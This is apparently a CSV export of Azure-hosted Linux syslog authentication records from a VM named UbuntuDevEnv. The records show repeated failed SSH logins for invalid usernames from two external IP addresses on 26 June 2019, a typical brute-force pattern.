+11886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:27:31,UbuntuDevEnv,2019-06-26 01:27:31,auth,UbuntuDevEnv,info,Invalid user smon from 131.108.48.151 port 34643,86462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smon,131.108.48.1,34643,,
+11887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:27:31,UbuntuDevEnv,2019-06-26 01:27:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:27:31,UbuntuDevEnv,2019-06-26 01:27:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,86462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:27:34,UbuntuDevEnv,2019-06-26 01:27:33,auth,UbuntuDevEnv,info,Failed password for invalid user smon from 131.108.48.151 port 34643 ssh2,86462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smon,131.108.48.1,34643,,
+11890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:27:34,UbuntuDevEnv,2019-06-26 01:27:34,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 34643:11: Bye Bye [preauth],86462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,34643,,
+11891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:27:34,UbuntuDevEnv,2019-06-26 01:27:34,auth,UbuntuDevEnv,info,Disconnected from invalid user smon 131.108.48.151 port 34643 [preauth],86462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smon,131.108.48.1,34643,,
+11892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:29:32,UbuntuDevEnv,2019-06-26 01:29:32,auth,UbuntuDevEnv,info,Invalid user deluge from 131.108.48.151 port 43187,86883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deluge,131.108.48.1,43187,,
+11893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:29:32,UbuntuDevEnv,2019-06-26 01:29:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:29:32,UbuntuDevEnv,2019-06-26 01:29:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,86883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:29:35,UbuntuDevEnv,2019-06-26 01:29:34,auth,UbuntuDevEnv,info,Failed password for invalid user deluge from 131.108.48.151 port 43187 ssh2,86883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deluge,131.108.48.1,43187,,
+11896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:29:35,UbuntuDevEnv,2019-06-26 01:29:34,auth,UbuntuDevEnv,info,Disconnected from invalid user deluge 131.108.48.151 port 43187 [preauth],86883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deluge,131.108.48.1,43187,,
+11897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:29:35,UbuntuDevEnv,2019-06-26 01:29:34,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 43187:11: Bye Bye [preauth],86883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,43187,,
+11898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:31:30,UbuntuDevEnv,2019-06-26 01:31:30,auth,UbuntuDevEnv,info,Invalid user cardini from 131.108.48.151 port 51772,87389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cardini,131.108.48.1,51772,,
+11899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:31:30,UbuntuDevEnv,2019-06-26 01:31:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,87389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:31:30,UbuntuDevEnv,2019-06-26 01:31:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:31:32,UbuntuDevEnv,2019-06-26 01:31:32,auth,UbuntuDevEnv,info,Failed password for invalid user cardini from 131.108.48.151 port 51772 ssh2,87389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cardini,131.108.48.1,51772,,
+11902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:31:32,UbuntuDevEnv,2019-06-26 01:31:32,auth,UbuntuDevEnv,info,Disconnected from invalid user cardini 131.108.48.151 port 51772 [preauth],87389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cardini,131.108.48.1,51772,,
+11903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:31:32,UbuntuDevEnv,2019-06-26 01:31:32,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 51772:11: Bye Bye [preauth],87389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,51772,,
+11904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:33:32,UbuntuDevEnv,2019-06-26 01:33:31,auth,UbuntuDevEnv,info,Invalid user pz from 131.108.48.151 port 60343,87822,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pz,131.108.48.1,60343,,
+11905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:33:32,UbuntuDevEnv,2019-06-26 01:33:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,87822,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:33:32,UbuntuDevEnv,2019-06-26 01:33:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87822,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:33:33,UbuntuDevEnv,2019-06-26 01:33:33,auth,UbuntuDevEnv,info,Failed password for invalid user pz from 131.108.48.151 port 60343 ssh2,87822,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pz,131.108.48.1,60343,,
+11908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:33:34,UbuntuDevEnv,2019-06-26 01:33:33,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 60343:11: Bye Bye [preauth],87822,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,60343,,
+11909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:33:34,UbuntuDevEnv,2019-06-26 01:33:33,auth,UbuntuDevEnv,info,Disconnected from invalid user pz 131.108.48.151 port 60343 [preauth],87822,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pz,131.108.48.1,60343,,
+11910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:35:31,UbuntuDevEnv,2019-06-26 01:35:30,auth,UbuntuDevEnv,info,Invalid user amber from 131.108.48.151 port 12413,88239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amber,131.108.48.1,12413,,
+11911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:35:31,UbuntuDevEnv,2019-06-26 01:35:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,88239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:35:31,UbuntuDevEnv,2019-06-26 01:35:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,88239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:35:33,UbuntuDevEnv,2019-06-26 01:35:32,auth,UbuntuDevEnv,info,Failed password for invalid user amber from 131.108.48.151 port 12413 ssh2,88239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amber,131.108.48.1,12413,,
+11914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:35:33,UbuntuDevEnv,2019-06-26 01:35:33,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 12413:11: Bye Bye [preauth],88239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,12413,,
+11915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:35:33,UbuntuDevEnv,2019-06-26 01:35:33,auth,UbuntuDevEnv,info,Disconnected from invalid user amber 131.108.48.151 port 12413 [preauth],88239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amber,131.108.48.1,12413,,
+11916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:01,UbuntuDevEnv,2019-06-26 01:37:01,auth,UbuntuDevEnv,info,Invalid user facturacion from 51.77.140.111 port 53208,88570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,facturacion,51.77.140.1,53208,,
+11917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:01,UbuntuDevEnv,2019-06-26 01:37:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,88570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:01,UbuntuDevEnv,2019-06-26 01:37:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,88570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+11919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:03,UbuntuDevEnv,2019-06-26 01:37:03,auth,UbuntuDevEnv,info,Failed password for invalid user facturacion from 51.77.140.111 port 53208 ssh2,88570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,facturacion,51.77.140.1,53208,,
+11920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:03,UbuntuDevEnv,2019-06-26 01:37:03,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 53208:11: Bye Bye [preauth],88570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,53208,,
+11921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:03,UbuntuDevEnv,2019-06-26 01:37:03,auth,UbuntuDevEnv,info,Disconnected from invalid user facturacion 51.77.140.111 port 53208 [preauth],88570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,facturacion,51.77.140.1,53208,,
+11922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:29,UbuntuDevEnv,2019-06-26 01:37:29,auth,UbuntuDevEnv,info,Invalid user adelphe from 131.108.48.151 port 20979,88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adelphe,131.108.48.1,20979,,
+11923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:29,UbuntuDevEnv,2019-06-26 01:37:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:29,UbuntuDevEnv,2019-06-26 01:37:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:31,UbuntuDevEnv,2019-06-26 01:37:31,auth,UbuntuDevEnv,info,Failed password for invalid user adelphe from 131.108.48.151 port 20979 ssh2,88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adelphe,131.108.48.1,20979,,
+11926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:31,UbuntuDevEnv,2019-06-26 01:37:31,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 20979:11: Bye Bye [preauth],88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,20979,,
+11927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:37:31,UbuntuDevEnv,2019-06-26 01:37:31,auth,UbuntuDevEnv,info,Disconnected from invalid user adelphe 131.108.48.151 port 20979 [preauth],88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adelphe,131.108.48.1,20979,,
+11928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:14,UbuntuDevEnv,2019-06-26 01:39:13,auth,UbuntuDevEnv,info,Invalid user tim from 51.77.140.111 port 49396,89038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tim,51.77.140.1,49396,,
+11929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:14,UbuntuDevEnv,2019-06-26 01:39:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:14,UbuntuDevEnv,2019-06-26 01:39:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,89038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+11931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:16,UbuntuDevEnv,2019-06-26 01:39:16,auth,UbuntuDevEnv,info,Failed password for invalid user tim from 51.77.140.111 port 49396 ssh2,89038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tim,51.77.140.1,49396,,
+11932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:17,UbuntuDevEnv,2019-06-26 01:39:16,auth,UbuntuDevEnv,info,Disconnected from invalid user tim 51.77.140.111 port 49396 [preauth],89038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tim,51.77.140.1,49396,,
+11933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:17,UbuntuDevEnv,2019-06-26 01:39:16,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 49396:11: Bye Bye [preauth],89038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,49396,,
+11934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:28,UbuntuDevEnv,2019-06-26 01:39:27,auth,UbuntuDevEnv,info,Invalid user xo from 131.108.48.151 port 29531,89082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xo,131.108.48.1,29531,,
+11935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:28,UbuntuDevEnv,2019-06-26 01:39:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:28,UbuntuDevEnv,2019-06-26 01:39:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,89082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:30,UbuntuDevEnv,2019-06-26 01:39:29,auth,UbuntuDevEnv,info,Failed password for invalid user xo from 131.108.48.151 port 29531 ssh2,89082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xo,131.108.48.1,29531,,
+11938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:30,UbuntuDevEnv,2019-06-26 01:39:30,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 29531:11: Bye Bye [preauth],89082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,29531,,
+11939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:39:30,UbuntuDevEnv,2019-06-26 01:39:30,auth,UbuntuDevEnv,info,Disconnected from invalid user xo 131.108.48.151 port 29531 [preauth],89082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xo,131.108.48.1,29531,,
+11940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:40:38,UbuntuDevEnv,2019-06-26 01:40:37,auth,UbuntuDevEnv,info,Invalid user vs from 51.77.140.111 port 38122,89340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vs,51.77.140.1,38122,,
+11941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:40:38,UbuntuDevEnv,2019-06-26 01:40:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,89340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+11942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:40:38,UbuntuDevEnv,2019-06-26 01:40:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:40:40,UbuntuDevEnv,2019-06-26 01:40:39,auth,UbuntuDevEnv,info,Failed password for invalid user vs from 51.77.140.111 port 38122 ssh2,89340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vs,51.77.140.1,38122,,
+11944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:40:40,UbuntuDevEnv,2019-06-26 01:40:39,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 38122:11: Bye Bye [preauth],89340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,38122,,
+11945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:40:40,UbuntuDevEnv,2019-06-26 01:40:39,auth,UbuntuDevEnv,info,Disconnected from invalid user vs 51.77.140.111 port 38122 [preauth],89340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vs,51.77.140.1,38122,,
